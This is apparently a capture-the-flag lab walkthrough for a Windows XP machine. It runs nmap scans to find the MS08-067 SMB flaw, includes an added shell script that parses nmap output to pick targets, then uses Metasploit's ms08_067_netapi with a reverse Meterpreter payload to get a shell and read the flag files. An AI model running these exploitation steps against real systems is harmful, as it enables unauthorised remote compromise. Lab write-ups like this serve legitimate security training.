Contents
- [1 Port scan](#1 端口扫描)
- [2 Approach](#2 测试思路)
- [3 Port 445 vulnerability testing](#3 445端口漏洞测试)
- [4 Flags](#4 flag)
Legacy walkthrough
1 Port scan
Default scripts (`-sC`) plus service/version detection (`-sV`) against the target:
```bash
nmap -sC -sV 10.129.227.181
```
![](https://file.jishuzhan.net/article/1774777294615744514/58e1c2c1abfd7789cce32f28e272eff2.webp)
2 Approach
**The target has ports 135, 139 and 445 open. Port 445 carries SMB, which has a long record of exploitable vulnerabilities, so testing starts there. The Nmap output also identifies the host as Windows XP, so the search is narrowed to SMB vulnerabilities that affect Windows XP.**
3 Port 445 vulnerability testing
**1. Scan for known SMB vulnerabilities**
The `vuln` NSE category includes the `smb-vuln-*` checks; an entry reporting `State: VULNERABLE` is what to look for in the output:
```bash
nmap -p 445 --script vuln 10.129.227.181
```
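As an added example (not part of the original writeup), the POSIX shell script below encodes the reasoning of section 2 and step 3.1 so it does not have to be done by eye: it reads normal-format nmap output, lists the open ports and the OS guess, picks SMB on 445 as the first target when it is open, builds the `--script vuln` command for it, and then filters vuln-script output down to the scripts that actually reached `State: VULNERABLE` together with their CVE ids. The two nmap outputs embedded in the script are constructed samples shaped like what the scans on this page produce, not captured output from the box, and the function names are my own.

```shell
#!/bin/sh
# Added example, not code from the original writeup. It automates the triage
# in sections 2 and 3.1: open ports -> OS guess -> SMB on 445 first -> read
# the `nmap --script vuln` findings. Both inputs below are CONSTRUCTED to look
# like nmap's normal (-oN) output for a host like the one in the post.

SCAN_OUTPUT='Nmap scan report for 10.129.227.181
Host is up (0.042s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp'

VULN_OUTPUT='Host script results:
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NO SERVICE (the spoolss service is inactive)'

# Target address from the "Nmap scan report for ..." header line.
target_ip() {
    printf '%s\n' "$1" | sed -n 's/^Nmap scan report for \([^ ]*\).*/\1/p' | head -n 1
}

# Open TCP ports, one per line, taken from the "PORT STATE SERVICE" table.
open_ports() {
    printf '%s\n' "$1" | awk '$1 ~ /^[0-9]+\/tcp$/ && $2 == "open" { sub(/\/tcp$/, "", $1); print $1 }'
}

# OS family inferred from service banners ("Service Info: OS(s): ..." line).
os_guess() {
    printf '%s\n' "$1" | sed -n 's/^Service Info: OSs*: \([^;]*\).*/\1/p'
}

# Exit 0 when the version scan points at Windows XP.
is_windows_xp() {
    case "$(os_guess "$1")" in
        *"Windows XP"*) return 0 ;;
        *) return 1 ;;
    esac
}

# First port to test: SMB on 445 if open, else the NetBIOS session port 139,
# else "none". This is the decision section 2 makes by hand.
first_target() {
    ports=$(open_ports "$1")
    if printf '%s\n' "$ports" | grep -qx 445; then
        echo 445
    elif printf '%s\n' "$ports" | grep -qx 139; then
        echo 139
    else
        echo none
    fi
}

# The command step 3.1 runs next, built from the scan rather than typed.
next_step() {
    port=$(first_target "$1")
    if [ "$port" = none ]; then
        echo "no SMB port open; pick another service"
    else
        echo "nmap -p $port --script vuln $(target_ip "$1")"
    fi
}

# From `--script vuln` output, print "<script> <CVE>" for every NSE script
# whose result reached "State: VULNERABLE"; "false" / "NO SERVICE" entries
# and the indented "VULNERABLE:" banner lines are ignored.
vulnerable_findings() {
    printf '%s\n' "$1" | awk '
        /^[|] [^ ]+:/ { name = $2; sub(/:$/, "", name); state = "" }
        /State: VULNERABLE/ { state = "VULNERABLE" }
        /IDs:/ && state == "VULNERABLE" {
            for (i = 1; i <= NF; i++)
                if ($i ~ /^CVE:/) { sub(/^CVE:/, "", $i); print name " " $i }
        }
    '
}

echo "open ports: $(echo $(open_ports "$SCAN_OUTPUT"))"
echo "os guess:   $(os_guess "$SCAN_OUTPUT")"
is_windows_xp "$SCAN_OUTPUT" && echo "Windows XP: look for XP-era SMB bugs first"
echo "next step:  $(next_step "$SCAN_OUTPUT")"
echo "vulnerable: $(vulnerable_findings "$VULN_OUTPUT")"
```

Run it as-is to see the triage on the constructed samples, or replace the two variables with the output of `nmap -sC -sV -oN scan.txt <ip>` and `nmap -p 445 --script vuln -oN vuln.txt <ip>` (for example `SCAN_OUTPUT=$(cat scan.txt)`). The parser only keys on line shapes nmap has used for years (the port table, the `Service Info` line, the `| script:` / `State:` / `IDs:` layout of `smb-vuln-*` results), so it is robust to the rest of the output changing.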
**2. Exploit the vulnerability**
Inside msfconsole, list the SMB exploit modules:
```
search exploit/windows/smb
```
The output lists many exploit modules. The one used here is ms08_067_netapi, which targets the Server service bug affecting Windows XP.
Load the module, choose a reverse Meterpreter payload and point it at the target (set LHOST to your VPN interface address if Metasploit does not pick it up automatically):
```
use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
set rhosts 10.129.227.181
set rport 445
run
```
![](https://file.jishuzhan.net/article/1774777294615744514/d222c9cbf674dc40bdc0a945fdf33964.webp)
![](https://file.jishuzhan.net/article/1774777294615744514/e0f05e226f60a4ea4abd513b0b23c0d2.webp)
4 Flags
From the Meterpreter session, drop to a Windows command shell with `shell` and read the two flags. The paths contain spaces, so they must be quoted or `type` will look for `C:\Documents`:
```bat
type "C:\Documents and Settings\john\Desktop\user.txt"
type "C:\Documents and Settings\Administrator\Desktop\root.txt"
```
![](https://file.jishuzhan.net/article/1774777294615744514/e8b7bf8e6630ffd6ccd4a3c088a84ab4.webp)